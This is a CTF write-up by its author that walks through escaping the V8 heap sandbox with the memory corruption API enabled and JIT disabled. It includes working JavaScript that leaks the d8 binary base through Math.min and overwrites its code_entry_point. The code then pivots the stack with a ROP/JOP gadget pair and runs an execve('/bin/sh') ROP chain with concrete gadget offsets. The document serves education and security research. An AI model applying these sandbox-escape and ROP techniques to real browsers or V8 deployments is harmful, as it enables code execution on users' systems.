KITCTFCTF 2022 V8 Heap Sandbox Escape

Two weeks ago we organized our first ever CTF, KITCTFCTF 2022. Even though it was a challenging and stressful task, I certainly had a blast preparing challenges and watching the playing teams progress.
One of my challenges, called Date, was a V8 exploitation challenge that unfortunately stayed unsolved during the CTF.
In this writeup, I’ll go over the intended solution in detail, which leads to a V8 (heap) sandbox escape without using the currently very popular JIT technique.

The Challenge

We are given an archive with a few files, most notably a d8 binary, a build.Dockerfile and a server.py, next to the setup for hosting the challenge on the remote server.
d8 is the V8 developer shell and can be used to experiment with the execution of javascript in V8.
The server.py script is running on the remote server and is executing the d8 binary with the arguments --jitless, --no-expose-wasm and a file with contents we can control. Essentially, the server lets us execute arbitrary javascript in V8 while JIT compilation is disabled and WASM cannot be used from our code.
So where is the catch? Surely, we don’t have to burn our precious V8 0-days for a CTF with a zero rating on CTFTime, right?

After taking a closer look at the build.Dockerfile below, we can see that V8 is built from commit 29131d5e3ea9cbfeae3e6dc3fd6c4439f0ac4bde and with the flags v8_enable_sandbox and v8_expose_memory_corruption_api set to true. Those flags enable the V8 sandbox and the memory corruption API respectively. The following two sections will touch on both of these features.

FROM ubuntu:22.04 as build

...

RUN cd /build && fetch v8 && cd v8 && \
    git checkout 29131d5e3ea9cbfeae3e6dc3fd6c4439f0ac4bde && \
    git apply ../remove_globals.patch && gclient sync

# build with enabled memory_corruption_api
RUN cd /build/v8 && gn gen out/release \
    --args='is_debug=false target_cpu="x64" v8_enable_sandbox=true v8_expose_memory_corruption_api=true' && \
    autoninja -C out/release d8

V8’s (Heap) Sandbox

The idea of the V8 sandbox was originally introduced in July 2021. Recently, this sandbox was enabled by default in V8 builds with commit a8c27fc.
I won’t go into detail here, so I highly recommend reading the High-Level Design Doc and the External Pointer Sandboxing Doc that describe the objectives and the internals of this new sandbox.
Essentially, the V8 sandbox is supposed to become a robust security boundary in the future by forcing attackers who can already corrupt arbitrary memory on the V8 heap to come up with an additional heap sandbox escape for a full renderer compromise. This is achieved by replacing all raw pointers on the V8 heap either with offsets relative to the heap base or with an index into an external pointer table that is located outside this sandboxed heap region.
However, due to the sandbox being in a very early stage, there are still some raw pointers left which we can play around with!

Escaping the Sandbox with JIT

There are some nice resources covering this technique already (e.g. Code Execution in Chromium’s V8 Heap Sandbox by Anvbis) so I won’t go into detail here. However, for the sake of completeness, a short summary is given in the following section.
In essence, function objects in V8 contain a code field which, in turn, contains a code_entry_point field. This field stores a full raw (unsandboxed) pointer to the actual machine code that is jumped to when the corresponding function is called. For a function that was JIT compiled, this field would point to an executable page containing the compiled machine code of this function.
The function object and the corresponding code object are stored on the V8 heap and can therefore be overwritten by an attacker with arbitrary read/write capabilities inside the heap sandbox. As this code_entry_point field is not validated in any way, overwriting it leads to direct control of the instruction pointer when the function is called.
How do we get RCE from here though? This is where the JIT compiler comes into play. We can encode small shellcode parts in floating point numbers because of the way those are translated to machine code and shift the code_entry_point a little bit. This way, when the compiled function is executed, our shellcode is executed instead of the code that was originally compiled.
As I have skipped over some important parts here, I highly recommend reading the mentioned blogpost which explains this more thoroughly.
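
To make the float trick a bit more concrete, here is a minimal sketch of the underlying conversion only: reinterpreting an 8-byte pattern as a double and back. The helper names u64ToDouble and doubleToU64 are my own and not part of V8, and whether a given constant ends up verbatim in the compiled code depends on the compiler, so treat this as an illustration rather than a recipe.

```javascript
// Shared 8-byte buffer viewed both as a 64-bit integer and as a double.
const convBuf = new ArrayBuffer(8);
const asU64 = new BigUint64Array(convBuf);
const asF64 = new Float64Array(convBuf);

// Reinterpret a 64-bit integer bit pattern as an IEEE-754 double.
function u64ToDouble(bits) {
    asU64[0] = bits;
    return asF64[0];
}

// Reinterpret a double as its raw 64-bit integer bit pattern.
function doubleToU64(value) {
    asF64[0] = value;
    return asU64[0];
}

// 0x3ff0000000000000 is the bit pattern of the double 1.0.
const one = u64ToDouble(0x3ff0000000000000n);
console.log(one, "0x" + doubleToU64(one).toString(16));
```

Bit patterns that decode to NaN may not survive such a round trip unchanged, which is one reason why the byte sequences have to be chosen with some care.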

V8’s Memory Corruption API

To ease testing of the sandbox and its ability to limit attackers in corrupting memory outside the V8 heap, a memory corruption API was introduced.
This API can be enabled with the v8_expose_memory_corruption_api flag and allows us, as the name suggests, to corrupt arbitrary memory inside the V8 heap. In addition, an addrOf primitive is exposed, effectively allowing us to get the (relative) address of arbitrary javascript objects.
All of this is encapsulated in a new Sandbox object that is accessible from within javascript.
The code below shows how Sandbox.MemoryView can be used in combination with a DataView to achieve an arbitrary read/write inside the sandbox. Moreover, I defined different readHeap/writeHeap functions for convenience that make use of this DataView to read from or write to the V8 heap at the given relative addresses. Whenever I am mentioning this “arbitrary” read/write from now on, I am referring to an arbitrary read/write inside the sandbox! A classic arbitrary read/write that would allow us to read/write anywhere, especially outside the sandbox, would already denote a sandbox escape.

var sbxMemView = new Sandbox.MemoryView(0, 0xfffffff8);
var dv = new DataView(sbxMemView);
var addrOf = (o) => Sandbox.getAddressOf(o);

var readHeap4 = (offset) => dv.getUint32(offset, true);
var readHeap8 = (offset) => dv.getBigUint64(offset, true);
// setUint8 takes no endianness argument
var writeHeap1 = (offset, value) => dv.setUint8(offset, value);
var writeHeap4 = (offset, value) => dv.setUint32(offset, value, true);
var writeHeap8 = (offset, value) => dv.setBigUint64(offset, value, true);
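
For experimenting with these helpers outside of a d8 build that exposes the memory corruption API, the same accessors can be pointed at an ordinary ArrayBuffer. This is only a sketch: makeHeapAccessors and the 64 KiB mock buffer are hypothetical stand-ins for the Sandbox.MemoryView, and nothing here touches real V8 heap memory.

```javascript
// Build read/write helpers over any ArrayBuffer-like object.
// In the challenge setting, `buffer` would be the Sandbox.MemoryView.
function makeHeapAccessors(buffer) {
    const view = new DataView(buffer);
    return {
        readHeap4: (offset) => view.getUint32(offset, true),
        readHeap8: (offset) => view.getBigUint64(offset, true),
        // single bytes have no endianness, so setUint8 takes two arguments
        writeHeap1: (offset, value) => view.setUint8(offset, value),
        writeHeap4: (offset, value) => view.setUint32(offset, value, true),
        writeHeap8: (offset, value) => view.setBigUint64(offset, value, true),
    };
}

// Mock "heap": 64 KiB of zeroed memory (assumption, for illustration only).
const mockHeap = makeHeapAccessors(new ArrayBuffer(0x10000));

mockHeap.writeHeap8(0x100, 0x1122334455667788n);
// Little-endian: the low 32 bits are stored first.
console.log(mockHeap.readHeap4(0x100).toString(16)); // 55667788
console.log(mockHeap.readHeap4(0x104).toString(16)); // 11223344
```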

We can easily verify the given addrOf primitive by defining an object and comparing the results of the returned address with the output of %DebugPrint (d8 has to be started with the --allow-natives-syntax parameter to expose %DebugPrint).

d8> var o = {a: 1337, b: 4242};
d8> addrOf(o).toString(16);
"10ca10"
d8> %DebugPrint(o);
DebugPrint: 0x13a20010ca11: [JS_OBJECT_TYPE]
 - map: 0x13a20025badd <Map[20](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x13a200244899 <Object map = 0x13a200243f55>
 - elements: 0x13a200002259 <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x13a200002259 <FixedArray[0]>
 - All own properties (excluding elements): {
    0x13a20000407d: [String] in ReadOnlySpace: #a: 1337 (const data field 0), location: in-object
    0x13a20000408d: [String] in ReadOnlySpace: #b: 4242 (const data field 1), location: in-object
 }

As we can see, the address returned by addrOf matches the lower 32 bits of the address printed by %DebugPrint perfectly, with the exception of the least significant bit. This deviation is caused by V8 using pointer tagging to internally differentiate between pointers and small integers. While addrOf returns the untagged (relative) pointer, %DebugPrint shows the tagged pointer as it would be stored in memory. If you want to know more about pointer tagging, small integers and V8 internals in general you should check out Jack Halon’s Chrome Browser Exploitation series which explains all of this in great detail.
It is also worth noting that the addrOf primitive does not return the full raw pointer to the object but only the offset relative to the V8 heap base.
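
The relationship between the two values can be spelled out with a few bit operations. The following sketch uses the pointer from the %DebugPrint output above; the variable names are only illustrative.

```javascript
// Full tagged pointer as printed by %DebugPrint in the session above.
const taggedFullPtr = 0x13a20010ca11n;

// Upper 32 bits: the base address of the V8 heap for this run.
const cageBase = taggedFullPtr & ~0xffffffffn;

// Lower 32 bits with the tag bit (bit 0) cleared: what addrOf returns.
const untaggedOffset = (taggedFullPtr & 0xffffffffn) & ~1n;

console.log("0x" + cageBase.toString(16));        // 0x13a200000000
console.log("0x" + untaggedOffset.toString(16));  // 0x10ca10
```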
Verifying the arbitrary read/write can be done by overwriting the length of an array as an example.

d8> var a = [0, 1, 2, 3, 4];
d8> var addrOfLength = addrOf(a) + 0xc;
d8> readHeap4(addrOfLength) >> 1;
5
d8> writeHeap4(addrOfLength, 1337 << 1);
d8> a.length;
1337

First of all, we define an array with a length of five. V8 stores this length at offset 0xc in memory (at least for the commit we are working with). With the addrOf primitive, we are then able to compute a relative pointer to this length in memory. Using the defined readHeap4 and writeHeap4 functions, we can verify that we can actually read and write the array length.
The shifting of the length stems from the fact that this length is stored as a small integer in V8 internally (refer to the mentioned blogpost for the details on this!).
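
As a quick illustration of that shift, here is a small sketch of the small integer (Smi) encoding as it is used in the session above: the value is shifted left by one so that the least significant bit, the tag, stays 0. The helper names are mine, and the encoding shown assumes a build with pointer compression like the one used for this challenge.

```javascript
// A Smi stores the integer shifted left by one; the tag bit (bit 0) is 0.
const toSmi = (value) => value << 1;
const fromSmi = (raw) => raw >> 1;

// Heap object pointers have the tag bit set instead.
const isSmi = (raw) => (raw & 1) === 0;

console.log(toSmi(5));              // 10, the raw value stored for length 5
console.log(fromSmi(toSmi(1337)));  // 1337
console.log(isSmi(0x10ca11));       // false, this is a tagged pointer
```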

In summary, the memory corruption API provides a method to obtain the relative address of any javascript object, in addition to the ability to read and write arbitrary memory inside the V8 heap.
Returning to the challenge, the goal should now be quite clear. We have to escape the V8 sandbox by utilizing the memory corruption API and without using JIT or WASM. Our 0-days seem to be safe for now after all.

Escaping the sandbox (again)

Unfortunately, as the JIT compiler is disabled, we cannot use the mentioned technique with the compiled floats that contain shellcode to get RCE. Using a function object and overwriting its code_entry_point to get control over the instruction pointer still works though!
While inspecting the V8 heap and searching for off-heap pointers, I realized that the code_entry_point of builtin functions like Math.min or console.log points to the executable region of the d8 binary (or to libv8.so for debug builds).
We can verify this in gdb with the Math.min function as an example by following the code (offset 0x18) and code_entry_point (offset 0xc) pointers:

d8> %DebugPrint(Math.min);
DebugPrint: 0x304d00187661: [Function] in OldSpace
   ...
 - builtin: MathMin
 - code: 0x304d0014efad <CodeDataContainer BUILTIN MathMin>
   ...

d8> %DebugPrintPtr(0x304d0014efad) // Math.min->code
DebugPrint: 0x304d0014efad: [CodeDataContainer] in OldSpace
   ...
 - kind: BUILTIN
 - builtin: MathMin
 - code_entry_point: 0x55555667ba00
   ...

pwndbg> x/gx 0x304d0014efac+0xc  
    0x304d0014efb8: 0x55555667ba00

pwndbg> vmmap 0x55555667ba00
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
             Start                End Perm     Size Offset File
    0x55555591c000     0x5555568fa000 r-xp   fde000 3c7000 /date/d8 +0xd5fa00

pwndbg> x/3i 0x55555667ba00
   0x55555667ba00 <Builtins_MathMin>:   push   rbp
   0x55555667ba01 <Builtins_MathMin+1>: mov    rbp,rsp
   0x55555667ba04 <Builtins_MathMin+4>: push   rsi

So, what have we got so far? RIP control and a large portion of executable memory that we can also get pointers to!
The first thing that comes to mind is trying to do ROP with this for RCE. Before we continue on this path though, we should verify that everything works properly from within javascript as well.

// resolve address of the Math.min JS_FUNCTION object on the V8 heap
var mathMinPtr = addrOf(Math.min);

// resolve Math.min->code at offset 0x18
var mathMinCodePtr = readHeap4(mathMinPtr + 0x18) - 1;

// read the pointer to the Builtins_MathMin function
var mathMinBuiltinFuncPtr = readHeap8(mathMinCodePtr + 0xc);

Making use of the readHeap functions in addition to the addrOf primitive, we can first resolve the address of the Math.min JS_FUNCTION object on the V8 heap and then follow the code and code_entry_point pointers to finally read the full raw 64-bit pointer to the Builtins_MathMin function. Printing the resulting values in hex shows that we indeed end up with the correct raw pointer!

Math.min @ 0x186598
Math.min->code @ 0x14de0c
Builtins_MathMin @ 0x55555667ba00
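
The pointer chasing can also be replayed on a mock heap without d8. The sketch below lays out only the two fields involved, using the addresses from the output above, and then performs the same resolution steps. The 2 MiB buffer and the constant names are assumptions for illustration; the field offsets are specific to the V8 commit used in this challenge.

```javascript
// Mock heap (assumption): 2 MiB of zeroed memory standing in for the sandbox.
const fakeHeap = new DataView(new ArrayBuffer(0x200000));

// Addresses taken from the output above.
const FUNC_ADDR = 0x186598;       // Math.min
const CODE_ADDR = 0x14de0c;       // Math.min->code
const CODE_OFFSET = 0x18;         // function object -> code
const ENTRY_POINT_OFFSET = 0xc;   // code -> code_entry_point

// Lay out the two fields the way the exploit expects to find them.
fakeHeap.setUint32(FUNC_ADDR + CODE_OFFSET, CODE_ADDR | 1, true);              // tagged, compressed
fakeHeap.setBigUint64(CODE_ADDR + ENTRY_POINT_OFFSET, 0x55555667ba00n, true);  // raw 64-bit pointer

// Same resolution steps as in the snippet above.
const codePtr = fakeHeap.getUint32(FUNC_ADDR + CODE_OFFSET, true) - 1;
const entryPoint = fakeHeap.getBigUint64(codePtr + ENTRY_POINT_OFFSET, true);

console.log("0x" + codePtr.toString(16));     // 0x14de0c
console.log("0x" + entryPoint.toString(16));  // 0x55555667ba00
```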

Now we can just subtract the constant offset for Builtins_MathMin and we have the base address of the d8 executable region.

var v8RXPageBase = mathMinBuiltinFuncPtr - 0xd5fa00n;

function rebase(x) {
    return v8RXPageBase + x;
}

I also defined a convenience function for rebasing offsets which comes in handy later.
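
As a sanity check, the subtraction can be replayed with the values from the gdb session: the result has to match the start of the executable mapping reported by vmmap. The names below are illustrative only.

```javascript
// Values from the gdb session above.
const builtinsMathMin = 0x55555667ba00n;
const mathMinOffset = 0xd5fa00n;   // offset into the mapping, as reported by vmmap

const rxBase = builtinsMathMin - mathMinOffset;
const rebaseOffset = (x) => rxBase + x;

console.log("0x" + rxBase.toString(16));                   // 0x55555591c000
console.log("0x" + rebaseOffset(0xc87bban).toString(16));  // 0x5555565a3bba
```

Note that all operands have to be BigInts here, since JavaScript throws a TypeError when BigInt and Number values are mixed in an addition.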
Verifying that we can get control of the instruction pointer is similarly straightforward. Using the writeHeap8 function, we can just overwrite the code_entry_point of the Math.min function and call it afterwards.

writeHeap8(mathMinCodePtr + 0xc, 0x4141414142424242n);
Math.min();

Executing this with gdb attached confirms that we overwrote the code_entry_point successfully, which leads to RIP control as expected. Nonetheless, there are still some obstacles to overcome: for now we can only execute a single gadget, whereas the final goal is to execute multiple gadgets that form an execve ROP chain. With V8 not being your typical CTF codebase, even if we could return cleanly and without crashing after executing one gadget, it is probably pretty difficult to do something persistent with just one ROP gadget alone. That said, instead of limiting ourselves to ROP exclusively, we can try to use JOP (jump-oriented programming) as well. We control a lot of memory where we can place additional gadget addresses, so using JOP makes sense here.
In the end, using one ROP and one JOP gadget to pivot the stack to the actual execve ROP chain worked out very reliably. The execve ROP chain will be written to the pivot location before the pivot happens of course. Concretely, I used the following two gadgets for the initial stack pivot:

0x0000000000c87bba: pop rsp; add rsp, 0x10; pop rbp; ret; 
0x0000000000cd6fb8: pop rdx; jmp qword ptr [rsi + 0x41];

To understand how the pivot works, let’s look at the state of the execution at the moment the overwritten code_entry_point is jumped to.

The first gadget performs the actual pivot and after execution rsp will be set to (*old_rsp) + 0x18. If we take a look at the stack after we get RIP control we can see that its top element points to an executable page which will neither be writable nor reside inside the V8 heap. Because we cannot write anything there, it is not a suitable pivot location. Instead, this is where the JOP gadget becomes relevant. There are a lot of pointers to the V8 heap (with 0x36ff00000000 being their base address for this execution) starting from rsp+8 on the stack and in some registers including rsi. If we could therefore increase the stack pointer first, for example by eight, and then execute the pop rsp gadget, we would have successfully pivoted the stack to a location inside the sandbox which we control. This is exactly what the mentioned JOP gadget is doing with the pop rdx.
To combine the two gadgets the code_entry_point of Math.min will be set to the address of the pop rdx; jmp qword ptr [rsi + 0x41]; gadget and the pop rsp gadget will be written to rsi + 0x41. When Math.min is executed in the end, rsp is increased by eight and the pivot is performed.
This would have resulted in a pivot to 0x36ff0018629d + 0x18 for this run. Now we just have to figure out where rsi and the value on the stack point to so that we can overwrite those with the gadget and the full execve ROP chain respectively.
With a bit of trial and error and a few uses of %DebugPrintPtr, we can figure out that rsi points to this + 0x38, with this being the globalThis javascript property. Additionally, the value on the stack points to the Math javascript object. Both of these objects live on the V8 heap so we can get pointers to them with the addrOf primitive and freely overwrite them as well (although we might crash somewhere if we are not careful).
After calculating the full raw pointers for the two gadgets that we need, we make use of the writeHeap8 function once more to write a sample ROP chain to the address of the pivoted stack and setup the two gadgets properly before calling Math.min.

// pop rdx; jmp qword ptr [rsi + 0x41]; 
var cleanUpStackRetAddrGadget = rebase(0xcd6fb8n);

// pop rsp; add rsp, 0x10; pop rbp; ret; 
var stackPivotGadget = rebase(0xc87bban);

var globalThisObjPtr = addrOf(this);
var pivotedStackAddress = addrOf(Math) + 0x18 + 1;

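// code_entry_point is stored at offset 0xc of the Math.min code object
var mathMinCodeEntryPointPtr = mathMinCodePtr + 0xc;
writeHeap8(mathMinCodeEntryPointPtr, cleanUpStackRetAddrGadget);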

writeHeap8(globalThisObjPtr + 0x38 + 1 + 0x41, stackPivotGadget);

var chain = [0x4343434343434343n, 0x4444444444444444n, 0x4545454545454545n];
for (var i = 0; i < chain.length; i++) {
    writeHeap8(pivotedStackAddress + i * 8, chain[i]);
}

Math.min();
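
To double-check the pivot arithmetic, the effect of the two gadgets on rsp can be traced with a tiny model of the machine state. This is a sketch only: the initial stack address and the return address on top of the stack are placeholders, while the tagged pointer to Math is the value from the run described above.

```javascript
// Tiny model of the relevant state: sparse memory and a few registers.
const mem = new Map();   // address (BigInt) -> qword (BigInt)
const regs = { rsp: 0x7ffc00001000n, rdx: 0n, rbp: 0n };  // rsp is a placeholder

const TAGGED_MATH = 0x36ff0018629dn;      // value found at rsp+8 in this run
mem.set(regs.rsp, 0x555555a00000n);       // placeholder: pointer into an executable page
mem.set(regs.rsp + 8n, TAGGED_MATH);

// pop: read the qword at rsp, then advance rsp by eight.
const pop = () => {
    const value = mem.get(regs.rsp) ?? 0n;
    regs.rsp += 8n;
    return value;
};

// Gadget 1: pop rdx; jmp qword ptr [rsi + 0x41]
regs.rdx = pop();        // discards the unusable top-of-stack value

// Gadget 2: pop rsp; add rsp, 0x10; pop rbp; ret
regs.rsp = pop();        // rsp = tagged pointer to Math
regs.rsp += 0x10n;
regs.rbp = pop();

// ret now fetches the first ROP chain entry from this address.
const firstChainSlot = regs.rsp;
console.log("0x" + firstChainSlot.toString(16));  // 0x36ff001862b5
```

The lower 32 bits of the result, 0x1862b5, equal the untagged offset of Math for this run (0x18629c) plus 0x18 + 1, which is exactly how pivotedStackAddress is computed.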

As we can see in the gdb screenshot below, the pivot works out the way we expected.

With the ability to execute an arbitrary ROP chain, getting RCE is simple. Ultimately, we are pretty much done now and even though this solution is rather straightforward, it took me quite some time to come up with something that worked well enough.
However, I should note a few things here that I struggled with during exploitation. You have to be pretty careful what you overwrite on the V8 heap as this often leads to crashes or weird behavior before you can take RIP control. Especially overwriting the first four bytes of an object, where a pointer to the map of the object is stored, will most likely crash somewhere on object access if the new pointer does not point to memory that at least somewhat resembles a valid map. Hence, the add rsp, 0x10; pop rbp; part of the stack pivot gadget ensures that we do not have to touch the first few bytes of the object and can start overwriting from offset 0x18.

In addition, I originally exploited this without --jitless and --no-expose-wasm even though I always intended to disable JIT. While executing d8 without --jitless and --no-expose-wasm, the code_entry_point of the builtins did not point to the executable region of the d8 binary but instead pointed to a separate executable region. This region contained fewer gadgets and its base address did not seem to be correlated with the one of the original executable region of d8. With fewer gadgets to work with, I ended up using the two gadgets I explained above. Without this restriction, there might be easier ways to get RCE.
When using --jitless and --no-expose-wasm, this did not happen though. After the CTF was over and I discussed the intended solution on Discord, I mentioned this as well. Although I verified the mentioned behavior on Ubuntu and Arch, this did not seem to be the case for everybody, so it might still be an OS-related issue. Since I still have not figured out what causes this, if anybody can reproduce this behavior and has an explanation, I would appreciate a quick DM on Twitter or Mastodon :D

Going back to the challenge, we can finish up by using a standard ROP chain that will result in the execution of execve("/bin/sh", 0, 0). Instead of just encoding the “/bin/sh” string in the ROP chain, I decided to write the command that is supposed to be executed to the V8 heap. It should be noted here that even though this approach might be a bit more flexible, encoding the command in the ROP chain is perfectly fine as well. In the end, I used the following ROP chain to get RCE.

xor esi, esi; ret;
xor edx, edx; ret; 
pop rdi; ret; 
<cmdBufferPtr> // full raw pointer to the command string on the V8 heap
pop rax; ret;
0x3b
syscall // execve(cmd, 0, 0)

This pointer to the command obviously needs to be a full raw 64-bit pointer so we also have to somehow get the base address of the V8 heap and add the offset of the command buffer to it. Luckily, this base address is present on the V8 heap and can be read from the relative address 0x1c. Consequently, if you need to turn offsets relative to the V8 heap base to full raw pointers you can just read the base address from there (assuming you have an arbitrary read inside the V8 heap of course). The code below shows how this part is implemented in javascript.

// read the upper 32 bits of the V8 heap base
var v8HeapBase = BigInt(readHeap4(0x1c)) << 32n;

const cmd = "/bin/sh";
var cmdBufferPtr = v8HeapBase + 0x180200n;

// write the command to the given offset on the V8 heap
for (var i = 0; i < cmd.length; i++) {
    writeHeap1(0x180200 + i, cmd.charCodeAt(i));
}
writeHeap1(0x180200 + cmd.length, 0);

The relative offset where the command is written to (0x180200) was pretty arbitrarily chosen. I just looked for regions on the V8 heap that did not contain other data and where the risk of corrupting anything important was low.
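
The two steps, turning a relative offset into a raw pointer and writing a NUL-terminated string, can be tried on a mock heap as well. In this sketch the 2 MiB buffer, the helper names and the value planted at offset 0x1c are assumptions for illustration; the base 0x36ff00000000 is the one from the run discussed earlier.

```javascript
// Mock heap (assumption): 2 MiB standing in for the sandbox memory view.
const heapView = new DataView(new ArrayBuffer(0x200000));

// Pretend the upper 32 bits of the heap base are stored at offset 0x1c.
heapView.setUint32(0x1c, 0x36ff, true);

const mockHeapBase = BigInt(heapView.getUint32(0x1c, true)) << 32n;
const toRawPointer = (offset) => mockHeapBase + BigInt(offset);

// Write a NUL-terminated ASCII string at the given relative offset.
function writeCString(offset, str) {
    for (let i = 0; i < str.length; i++) {
        heapView.setUint8(offset + i, str.charCodeAt(i));
    }
    heapView.setUint8(offset + str.length, 0);
}

const CMD_OFFSET = 0x180200;
writeCString(CMD_OFFSET, "/bin/sh");
console.log("0x" + toRawPointer(CMD_OFFSET).toString(16));  // 0x36ff00180200
```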

To conclude, using the mentioned ROP chain that can also be seen in the code below resulted in the execution of the specified command and therefore in a shell being spawned.

var ropchainExecve = [
    rebase(0x289e0n),
    rebase(0x873541n),
    rebase(0xeacd9n),
    cmdBufferPtr,
    rebase(0x83b67n),
    0x3bn,
    rebase(0xff0bfn)
];


for (var i = 0; i < ropchainExecve.length; i++) {
    writeHeap8(pivotedStackAddress + i * 8, ropchainExecve[i]);
}

Math.min();
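
When debugging a chain like this, it helps to keep each entry next to a label and print the resulting stack layout before writing it. The following sketch does that with the gadget offsets from above; the two base values are taken from the debugging sessions shown earlier and will differ on every run, and the helper names are illustrative.

```javascript
// Example values from the sessions above; in the exploit these come from the
// leaked Builtins_MathMin pointer and the heap base read from offset 0x1c.
const exampleRxBase = 0x55555591c000n;
const exampleCmdPtr = 0x36ff00180200n;
const gadget = (offset) => exampleRxBase + offset;

const SYS_EXECVE = 0x3bn;  // syscall number 59 on x86-64 Linux

const labeledChain = [
    ["xor esi, esi; ret", gadget(0x289e0n)],
    ["xor edx, edx; ret", gadget(0x873541n)],
    ["pop rdi; ret", gadget(0xeacd9n)],
    ["rdi = pointer to command string", exampleCmdPtr],
    ["pop rax; ret", gadget(0x83b67n)],
    ["rax = SYS_execve", SYS_EXECVE],
    ["syscall", gadget(0xff0bfn)],
];

// Print the stack layout, one qword per line.
labeledChain.forEach(([label, value], i) => {
    const slot = (i * 8).toString(16).padStart(2, "0");
    console.log(`+0x${slot}  0x${value.toString(16).padStart(16, "0")}  ${label}`);
});

// The plain array of qwords that would be written to the pivoted stack.
const chainValues = labeledChain.map(([, value]) => value);
```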

Using the full exploit on the original remote server will finally allow us to get the flag. The full exploit can be found here.

I intend to keep this challenge as well as my other challenges available on the remote for the foreseeable future. So if you want to get your hands dirty and exploit it yourself, you can still do so: nc kitctf.me 6969